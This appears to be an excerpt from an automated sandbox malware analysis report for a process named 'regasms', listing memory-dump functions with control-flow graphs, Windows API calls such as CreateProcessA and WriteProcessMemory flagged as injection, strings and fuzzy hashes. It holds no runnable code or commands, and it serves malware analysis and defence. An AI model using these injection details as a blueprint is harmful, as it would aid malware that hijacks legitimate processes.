                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21a38dadc83ba1d149f873667c6ec5e39093a42e4c3001b93919b02e135a215b
                                  • Instruction ID: 60b03e918dd14e4241b1be70d4b450b0941810bf41f7d9524205f7d26d30123a
                                  • Opcode Fuzzy Hash: 21a38dadc83ba1d149f873667c6ec5e39093a42e4c3001b93919b02e135a215b
                                  • Instruction Fuzzy Hash: 9A917035E003199FCB05DFA4D8949DDBBBAFF89310F548215E916AB2A4DF30E985CB50
                                  Function 05850BC8 Relevance: .2, Instructions: 220COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d87df359ef682d50c4304b40921076b40955b68b17e2484128115b20cf4d971c
                                  • Instruction ID: f7de7d852ee698d5d8c4c166f0d61d0496f4541601d875f1bf4c9240a2123697
                                  • Opcode Fuzzy Hash: d87df359ef682d50c4304b40921076b40955b68b17e2484128115b20cf4d971c
                                  • Instruction Fuzzy Hash: 67916035E003199FCB05DFA4D8949DDBBB6FF89310F588215E916AB264DF30A985CB90
                                  Function 00A13E34 Relevance: .2, Instructions: 196COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c076cd104d51a4ab41ec34fa5a6df83b70b66b365b1636bc17fc97547647f16b
                                  • Instruction ID: bfbab7de3216b1366c356c519a0ffe14a40402610222649dcc9ec14ec72256b0
                                  • Opcode Fuzzy Hash: c076cd104d51a4ab41ec34fa5a6df83b70b66b365b1636bc17fc97547647f16b
                                  • Instruction Fuzzy Hash: 5881C774E013089FDF18EFA9D994ADEBBB2FF89310F148129E415AB365DA345982CF50
                                  Function 07226A80 Relevance: .2, Instructions: 162COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c096df50323f6dc6061f135376c6a3fbe874a1709d83ee3654a04826c58b0b14
                                  • Instruction ID: a8bb71bf1ff51dd69ff7705b3fa805743d60823f2b1dbded0179cd8499e84c38
                                  • Opcode Fuzzy Hash: c096df50323f6dc6061f135376c6a3fbe874a1709d83ee3654a04826c58b0b14
                                  • Instruction Fuzzy Hash: 085129B2D39228EBDB04CFA6D4846EDBBFAFB4A300F14A025D409B3651DB758446DF04
                                  Function 00A16F90 Relevance: .1, Instructions: 140COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2de1e74a24b94ec02a1b4a6f50e1d8b6696f274e3d5dbf3f727d2a227c5947d
                                  • Instruction ID: 9c583305d9af2499ec5eae6e84cb36ba66a4828b4233a7eaba0a05845e9bbd9a
                                  • Opcode Fuzzy Hash: b2de1e74a24b94ec02a1b4a6f50e1d8b6696f274e3d5dbf3f727d2a227c5947d
                                  • Instruction Fuzzy Hash: C8511670E012489FDB18DFA9D991ADEBBB2BF89300F148129E415BB365DA345D46CF90
                                  Function 07226A71 Relevance: .1, Instructions: 123COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7033c3ce2df0b87d3f106cc2a3e1c5a559c4b101c68dfedaffeea8eed3cb63a9
                                  • Instruction ID: 2d396ff6c98ea822bca7116708e573c756a2abdae238872cc914aafefa465d74
                                  • Opcode Fuzzy Hash: 7033c3ce2df0b87d3f106cc2a3e1c5a559c4b101c68dfedaffeea8eed3cb63a9
                                  • Instruction Fuzzy Hash: B7413FB6D29218EBDB04CFA6D4842EDBBFABF4A310F14E025D409B3655DB758446DF40
                                  Function 00A1D570 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1264 a1d570-a1d572 1265 a1d574 1264->1265 1266 a1d576-a1d60f GetCurrentProcess 1264->1266 1265->1266 1270 a1d611-a1d617 1266->1270 1271 a1d618-a1d64c GetCurrentThread 1266->1271 1270->1271 1272 a1d655-a1d689 GetCurrentProcess 1271->1272 1273 a1d64e-a1d654 1271->1273 1275 a1d692-a1d6ad call a1d75b 1272->1275 1276 a1d68b-a1d691 1272->1276 1273->1272 1278 a1d6b3-a1d6e2 GetCurrentThreadId 1275->1278 1276->1275 1280 a1d6e4-a1d6ea 1278->1280 1281 a1d6eb-a1d74d 1278->1281 1280->1281
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00A1D5FE
                                  • GetCurrentThread.KERNEL32 ref: 00A1D63B
                                  • GetCurrentProcess.KERNEL32 ref: 00A1D678
                                  • GetCurrentThreadId.KERNEL32 ref: 00A1D6D1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 41fa675d904d12b1aa5844108e493cb2dc76f9ae186eaf2bfe6a6d9c001fe551
                                  • Instruction ID: 49654b1de0961c5a3d06173f721442d1cfaf26699da4daf546607554f72786f0
                                  • Opcode Fuzzy Hash: 41fa675d904d12b1aa5844108e493cb2dc76f9ae186eaf2bfe6a6d9c001fe551
                                  • Instruction Fuzzy Hash: E05176B1900749CFEB15CFA9C648BDEBBF1EF88304F20845AE019AB391D7345984CB26
                                  Function 00A1D580 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1288 a1d580-a1d60f GetCurrentProcess 1292 a1d611-a1d617 1288->1292 1293 a1d618-a1d64c GetCurrentThread 1288->1293 1292->1293 1294 a1d655-a1d689 GetCurrentProcess 1293->1294 1295 a1d64e-a1d654 1293->1295 1297 a1d692-a1d6ad call a1d75b 1294->1297 1298 a1d68b-a1d691 1294->1298 1295->1294 1300 a1d6b3-a1d6e2 GetCurrentThreadId 1297->1300 1298->1297 1302 a1d6e4-a1d6ea 1300->1302 1303 a1d6eb-a1d74d 1300->1303 1302->1303
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00A1D5FE
                                  • GetCurrentThread.KERNEL32 ref: 00A1D63B
                                  • GetCurrentProcess.KERNEL32 ref: 00A1D678
                                  • GetCurrentThreadId.KERNEL32 ref: 00A1D6D1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 1865a1876512d7fff2ccb66c3b1d9a427cd6ff8cc2b22f01fddc94f2d4368963
                                  • Instruction ID: 6aec7d13bfbf5e746a8bfde2cf9bc729a8e30f0b3a279e1a0fb6ff1f39119714
                                  • Opcode Fuzzy Hash: 1865a1876512d7fff2ccb66c3b1d9a427cd6ff8cc2b22f01fddc94f2d4368963
                                  • Instruction Fuzzy Hash: 9F5157B0900749DFEB14CFAAD548BDEBBF5EF88304F208459E019A7391D7746984CB66
                                  Function 06E19250 Relevance: 3.9, Strings: 3, Instructions: 108COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1359 6e19250-6e19252 1360 6e19254-6e19258 1359->1360 1361 6e1925a 1359->1361 1360->1361 1362 6e19262-6e19276 1361->1362 1363 6e1925b-6e1925d 1361->1363 1366 6e19333-6e19342 1362->1366 1364 6e191f3 1363->1364 1365 6e1925f 1363->1365 1367 6e19235-6e19247 1364->1367 1365->1362 1370 6e1934d-6e193ae 1366->1370 1385 6e1932a 1370->1385 1387 6e19280 1385->1387 1388 6e19287-6e19331 1385->1388 1387->1366 1387->1388 1389 6e19315-6e19329 1387->1389 1390 6e192b7-6e192d5 1387->1390 1388->1385 1395 6e192d7-6e192da 1390->1395 1396 6e192dc-6e192e9 1390->1396 1397 6e192eb-6e192fa 1395->1397 1396->1397 1400 6e19312 1397->1400 1401 6e192fc-6e19302 1397->1401 1400->1389 1402 6e19304 1401->1402 1403 6e19306-6e19308 1401->1403 1402->1400 1403->1400
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8q$8q$8q
                                  • API String ID: 0-3169173723
                                  • Opcode ID: 21f86a9ae6c78a68c5d357cf956137b157130728a74de09b283b992d6f7a078f
                                  • Instruction ID: 056bbdc6266f42aa8d3ae9526cdfb9b56b7578fcb727a782928d02e7bf151397
                                  • Opcode Fuzzy Hash: 21f86a9ae6c78a68c5d357cf956137b157130728a74de09b283b992d6f7a078f
                                  • Instruction Fuzzy Hash: F731C274E08305DFEB849B9494696FE76A6EB88300B549426D50BEF287D6318D0397E2
                                  Function 06E1839F Relevance: 3.8, Strings: 3, Instructions: 39COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1427 6e1839f-6e183d7 1429 6e183e0-6e183e2 1427->1429 1430 6e183e4-6e183ea 1429->1430 1431 6e183fa-6e18417 1429->1431 1432 6e183ec 1430->1432 1433 6e183ee-6e183f0 1430->1433 1435 6e18582-6e18587 1431->1435 1436 6e1841d-6e18513 1431->1436 1432->1431 1433->1431
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$$q$$q
                                  • API String ID: 0-3275118826
                                  • Opcode ID: 1f70cf4cb0a27df4201c1a1b6bd22b4d2b6adf5ba6fe8b8c604d7bdc735caeac
                                  • Instruction ID: 77a93e1b3d7079ee5fbd7003e38af0da63e22d4c62971daedf42997293d2f48b
                                  • Opcode Fuzzy Hash: 1f70cf4cb0a27df4201c1a1b6bd22b4d2b6adf5ba6fe8b8c604d7bdc735caeac
                                  • Instruction Fuzzy Hash: D201D630B40305DFF7A05A64DC1A7EB3262AB50704F18A852DD06AF683EAA18C91D792
                                  Function 06E12AD8 Relevance: 2.7, Strings: 2, Instructions: 221COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2269 6e12ad8-6e12ae7 2270 6e12aef-6e12af1 2269->2270 2271 6e12af3-6e12b08 2270->2271 2272 6e12b0b-6e12b78 call 6e120d8 2270->2272 2281 6e12c24-6e12c3b 2272->2281 2282 6e12b7e-6e12b80 2272->2282 2295 6e12c41 2281->2295 2296 6e12c3d-6e12c3f 2281->2296 2283 6e12cb0-6e12cee 2282->2283 2284 6e12b86-6e12b91 call 6e122f0 2282->2284 2316 6e12cf0-6e12cf5 2283->2316 2317 6e12cf6-6e12d57 2283->2317 2290 6e12b93-6e12b95 2284->2290 2291 6e12bae-6e12bb2 2284->2291 2297 6e12ba0-6e12bab call 6e116cc 2290->2297 2298 6e12b97-6e12b9e 2290->2298 2292 6e12c11-6e12c1a 2291->2292 2293 6e12bb4-6e12bc8 call 6e12418 2291->2293 2307 6e12bca-6e12bdb call 6e116cc 2293->2307 2308 6e12bde-6e12be2 2293->2308 2301 6e12c46-6e12c48 2295->2301 2296->2301 2297->2291 2298->2291 2305 6e12c4a-6e12c76 2301->2305 2306 6e12c7d-6e12ca9 2301->2306 2305->2306 2306->2283 2307->2308 2312 6e12be4 2308->2312 2313 6e12bea-6e12c03 2308->2313 2312->2313 2321 6e12c05 2313->2321 2322 6e12c0e 2313->2322 2316->2317 2325 6e12d60-6e12d81 2317->2325 2326 6e12d59-6e12d5f 2317->2326 2321->2322 2322->2292 2326->2325
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (q$Hq
                                  • API String ID: 0-1154169777
                                  • Opcode ID: 0502ea09e36f600dbd9d6c03603f167db22423b830e143b9cba6d26f19a412b5
                                  • Instruction ID: 4b034aff13fe0516b6d8b0321c09582fee268e98fb22d27abeec79dceb403eb2
                                  • Opcode Fuzzy Hash: 0502ea09e36f600dbd9d6c03603f167db22423b830e143b9cba6d26f19a412b5
                                  • Instruction Fuzzy Hash: 7C71C131E003088FDB54DF69D904BAEBBF6EFC8310F148429E505AB340DB349A45DBA5
                                  Function 06E1778F Relevance: 2.7, Strings: 2, Instructions: 213COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2331 6e1778f-6e177a2 2333 6e177a4-6e177a6 2331->2333 2334 6e177aa-6e177ba 2331->2334 2333->2334 2335 6e177c2 2334->2335 2336 6e177bc-6e177c0 2334->2336 2337 6e177c4-6e177c5 2335->2337 2338 6e177ca-6e17856 2335->2338 2336->2335 2340 6e177c7 2337->2340 2341 6e1775b-6e1a948 2337->2341 2355 6e1785e-6e17867 call 6e17a46 2338->2355 2340->2338 2345 6e1a950-6e1a952 2341->2345 2346 6e1a94b call 6e17778 2341->2346 2348 6e1a954-6e1a960 2345->2348 2349 6e1a95a-6e1a960 2345->2349 2346->2345 2356 6e1786d-6e178c3 call 6e174a0 2355->2356 2365 6e178c5 2356->2365 2366 6e178c7-6e178d3 2356->2366 2367 6e178d5-6e17a36 2365->2367 2366->2367
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %*&/)(#$^@!~-_$0,Gq
                                  • API String ID: 0-773394015
                                  • Opcode ID: 28bbab269ef3fde121a482edf18adc669a21509bfd7b16e4abedc8d24bb18305
                                  • Instruction ID: 34a7c8b524c705e53d8928f6ac97082e030590128c990ba702e447571d4260be
                                  • Opcode Fuzzy Hash: 28bbab269ef3fde121a482edf18adc669a21509bfd7b16e4abedc8d24bb18305
                                  • Instruction Fuzzy Hash: 5F81C534A053449FEB00EB78D455AAE7BB2EF89300F1585EAD8859F387CB316D46C791
                                  Function 06E177C8 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2425 6e177c8-6e17867 call 6e17a46 2434 6e1786d-6e178c3 call 6e174a0 2425->2434 2443 6e178c5 2434->2443 2444 6e178c7-6e178d3 2434->2444 2445 6e178d5-6e17a36 2443->2445 2444->2445
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %*&/)(#$^@!~-_$0,Gq
                                  • API String ID: 0-773394015
                                  • Opcode ID: bb3f26aa9d566d07a9a89848f90b731fbc78065738d5ae599632467aec4eae55
                                  • Instruction ID: 9e78687d0512c7f0be9acf4ee123ec2c9ebad9dd2e8e43e8e5c0e07a4c9204f5
                                  • Opcode Fuzzy Hash: bb3f26aa9d566d07a9a89848f90b731fbc78065738d5ae599632467aec4eae55
                                  • Instruction Fuzzy Hash: C7618334F006059FEB14AF64D455AAEB7B2FF88300F1485A9D9855F386CB71AE86C7C1
                                  Function 06E182D0 Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2486 6e182d0-6e182dc 2487 6e18333 2486->2487 2488 6e182de-6e18335 call 6e1839f 2486->2488 2487->2488 2490 6e1833b-6e1833d 2488->2490 2494 6e182e6-6e182ec 2490->2494 2495 6e182fc-6e1830b 2490->2495 2496 6e182f0-6e182f2 2494->2496 2497 6e182ee 2494->2497 2498 6e1830d-6e1831a 2495->2498 2499 6e1833f-6e1851f 2495->2499 2496->2495 2497->2495 2498->2499 2500 6e1831c-6e18332 2498->2500
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q$$q
                                  • API String ID: 0-3126353813
                                  • Opcode ID: bc99c99e89dd0a22af987e7eb5fd3d5abbd9586e06caaaa8e3b29ade28cda6f0
                                  • Instruction ID: 170a0ed843e8972bcecdb2aa240b3854575c5cf5cc431521d9048176b79a0d89
                                  • Opcode Fuzzy Hash: bc99c99e89dd0a22af987e7eb5fd3d5abbd9586e06caaaa8e3b29ade28cda6f0
                                  • Instruction Fuzzy Hash: 5C11C470D09345DFE391DB64C9086B7BBB5BB06244F0892ABE40ADF142D7348902D7E6
                                  Function 07225CDC Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07225F1E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: ef82694fa3c254fcacc2b782f8a394a1bfd999aa873174dcf22907b352e7f674
                                  • Instruction ID: 4cee575380e43032f48b41f93a433eef20b60a7534f748f155026b70c5d05ea4
                                  • Opcode Fuzzy Hash: ef82694fa3c254fcacc2b782f8a394a1bfd999aa873174dcf22907b352e7f674
                                  • Instruction Fuzzy Hash: 39A171B1D1032ADFEB24CF69C8417EDBBB1BF45310F1481A9E818A7240DB749991DF91
                                  Function 07225CE8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07225F1E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 4a973a572f37c6731c3b93e986f49026589c1d50ec434ca4bf934145f1eb1bf7
                                  • Instruction ID: e189694404a0c44b2f769e0cd50d7686a5b7593ecd344fd3ce17ed86c05a9acc
                                  • Opcode Fuzzy Hash: 4a973a572f37c6731c3b93e986f49026589c1d50ec434ca4bf934145f1eb1bf7
                                  • Instruction Fuzzy Hash: 879171B1D1032ADFEB24DF69C8417EDBBB1BF45310F1481A9E818A7240DB749992DF91
                                  Function 00A1B313 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00A1B566
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: b536410dc9bcc8fc0daff498f28a6b337465aac9d8bdd13d89fc782b53559693
                                  • Instruction ID: 1a9e19554639937ec6c10ce0e6b5e74d1ff01733a81780c7fcb6ff796260980a
                                  • Opcode Fuzzy Hash: b536410dc9bcc8fc0daff498f28a6b337465aac9d8bdd13d89fc782b53559693
                                  • Instruction Fuzzy Hash: AC714770A10B049FD724DF6AD14179ABBF1FF88310F10892EE09ADBA50D774E995CBA1
                                  Function 05851DE4 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05851F02
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 0323ef7534685ed47cae69f72da3da7cb634360e09995eaa5ad5bdb6448c0162
                                  • Instruction ID: c757fcd8898615e42a8eeb1512a1bcb9c25d172c297bc49780916f85dcb01d73
                                  • Opcode Fuzzy Hash: 0323ef7534685ed47cae69f72da3da7cb634360e09995eaa5ad5bdb6448c0162
                                  • Instruction Fuzzy Hash: 3051B0B5D10348EFDB14CFA9C984ADEBBB5BF48310F24812AE819AB250D7759985CF90
                                  Function 05851DF0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05851F02
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: b25d82f0a2bb437917c035d055bdf27d1d8aba21aa1467aa8194d2f7b29aa61b
                                  • Instruction ID: 290f94acf85610c61eddfd930aebb1e2fd13f59cdc4f7c5df81185894ded9f5a
                                  • Opcode Fuzzy Hash: b25d82f0a2bb437917c035d055bdf27d1d8aba21aa1467aa8194d2f7b29aa61b
                                  • Instruction Fuzzy Hash: 1D41AEB1D10349EFDB14CFA9C884ADEBBB5FF48310F64812AE819AB250D7759945CF90
                                  Function 00A1590C Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00A159C9
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: cd651c2f0d0b2af0ce4ee115a24b36021ee9adccc4029cdd83f8b86094b47865
                                  • Instruction ID: 321f0d803fadeb353af1e544cedb1159e4fed0a68cd0bc263d5e07459688db9c
                                  • Opcode Fuzzy Hash: cd651c2f0d0b2af0ce4ee115a24b36021ee9adccc4029cdd83f8b86094b47865
                                  • Instruction Fuzzy Hash: 0541EFB1C00718CBEF24DFAAC884BDDBBB5AF89304F20815AD408AB251D7755986CF50
                                  Function 00A15A84 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2027f987a775b11bc810fe775e26f87438c0f51409161217d87c9707d94e7e73
                                  • Instruction ID: f218fe51911728c7ca5b9132a9706d5e9c003842214908a8258f8e7161e8aabb
                                  • Opcode Fuzzy Hash: 2027f987a775b11bc810fe775e26f87438c0f51409161217d87c9707d94e7e73
                                  • Instruction Fuzzy Hash: A941AD71C05B58CFDF15CFB9C8497EDBBB0AF96324F24818AC015AB252C7755986CB12
                                  Function 05850CD4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                  Download Yara Rule
                                  APIs
                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05854471
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID: CallProcWindow
                                  • String ID:
                                  • API String ID: 2714655100-0
                                  • Opcode ID: b90bbd004313d045fb3a00e0f702e1112eeaf18e0be90092fcb90744b1b88bcb
                                  • Instruction ID: c3a9dcbf40902e73704d022e3c11900a90399d180c4fd5a2a1e125f032b7cdec
                                  • Opcode Fuzzy Hash: b90bbd004313d045fb3a00e0f702e1112eeaf18e0be90092fcb90744b1b88bcb
                                  • Instruction Fuzzy Hash: C04129B5900309DFDB15CF99C488BAABBF5FF88314F24C459E919AB321D374A845CBA0
                                  Function 00A144B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00A159C9
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 3c2ddfaa5350c84d317b3f4e72088637001735b7291bd43aa08fef291501806c
                                  • Instruction ID: f8564042cc9362b049eaf0a1dbde6207a16e3a0a3215eb22b8449aba4504811a
                                  • Opcode Fuzzy Hash: 3c2ddfaa5350c84d317b3f4e72088637001735b7291bd43aa08fef291501806c
                                  • Instruction Fuzzy Hash: F041B171C00719CFEB24DFAAC8847DEBBB5BF89304F20816AD409AB251D7756945CF90
                                  Function 07225A59 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07225AF0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: efe93fed207d983fef370c135e5a58e8d067fe330f9acd82a46709f1e23d27f1
                                  • Instruction ID: e69599de0ff66a8ff4f2c32a0218979c3c8b1b4eeaf10c332536b8e9e881e46c
                                  • Opcode Fuzzy Hash: efe93fed207d983fef370c135e5a58e8d067fe330f9acd82a46709f1e23d27f1
                                  • Instruction Fuzzy Hash: 7B2148B6910359AFDB10CFAAC881BDEBBF5FF48310F10842AE918A7240C7799551DBA4
                                  Function 07225A60 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                  Download Yara Rule
                                  APIs
